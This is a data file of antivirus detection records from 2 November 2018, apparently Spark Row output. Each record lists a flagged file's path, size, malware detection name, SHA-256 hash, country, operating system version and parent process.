  Row(detection=Row(filename='avscan-20181102-052504-9fc7f309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052504-9FC7F309', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000751', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp00000751', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050720-2542dc4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050720-2542DC4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rwamhpvn.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\rwAmHpvN.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140612-f78b62ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140612-F78B62EA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152021-94dc3223', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec41cbbd\\AVSCAN-20181102-151917-8CC5D735\\AVSCAN-20181102-152021-94DC3223', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120336-07cd111c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120336-07CD111C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-719198c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-719198C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050455-cf00196f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050455-CF00196F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054052-d478a1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054052-D478A1F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053652-45d90ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053652-45D90FFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053442-f7eb0df7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053442-F7EB0DF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050824-4ba2d663', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050824-4BA2D663', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052950-49efe892', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052950-49EFE892', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053856-8f79f666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053856-8F79F666', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060307-f0867091', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060307-F0867091', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051604-5e207cc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051604-5E207CC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054953-16fda071', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054953-16FDA071', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060411-16d62dec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060411-16D62DEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061856-261d711e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061856-261D711E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060336-01f07b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060336-01F07B71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062502-003c03ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062502-003C03CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050955-81cd4447', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050955-81CD4447', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051055-a5668daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051055-A5668DAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052405-7c9a3c04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052405-7C9A3C04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055051-39cb8c4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055051-39CB8C4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062453-fa9c62d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062453-FA9C62D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bd031b88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BD031B88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052147-2a2f5571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052147-2A2F5571', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-35518302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-35518302', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053046-6b56afed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053046-6B56AFED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062448-f7b10169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062448-F7B10169', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054448-61a1c945', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054448-61A1C945', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051207-d09c4891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051207-D09C4891', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060734-8fadf3ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060734-8FADF3AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051204-ced8be52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051204-CED8BE52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060733-8f424e5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060733-8F424E5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055454-ca7329a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055454-CA7329A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061513-a1236d51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061513-A1236D51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053754-6a82e21e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053754-6A82E21E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053208-9c6649af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053208-9C6649AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053748-6750e8ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053748-6750E8AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062407-df853edd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062407-DF853EDD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051252-eb19c3bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051252-EB19C3BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053952-b0b06b27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053952-B0B06B27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053515-0bd7bf15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053515-0BD7BF15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055812-40a8c3b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055812-40A8C3B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053602-27ff1063', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053602-27FF1063', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062312-bef63390', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062312-BEF63390', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aimp3lib.exe', filepath='C:\\Program Files\\AIMP3\\AIMP3lib.exe', filesize=960000, name='W32/Infector.Gen8.#M300.#R700821'), hash='7753372852a272e5cbd6b39366f57c29adbce46f072f54fedf8b5a752816ee1d', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:34:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aff5164e19a594d6aa5f1376f1f6687fb7cd7eb5', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\aff5164e19a594d6aa5f1376f1f6687fb7cd7eb5', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='774f71ae96387e84a4b56cf01c3186a19b5e245e2da0a01daa8dc1af23751abb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-02T22:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:47Z'), dt=datetime.date(2018, 11, 2)),
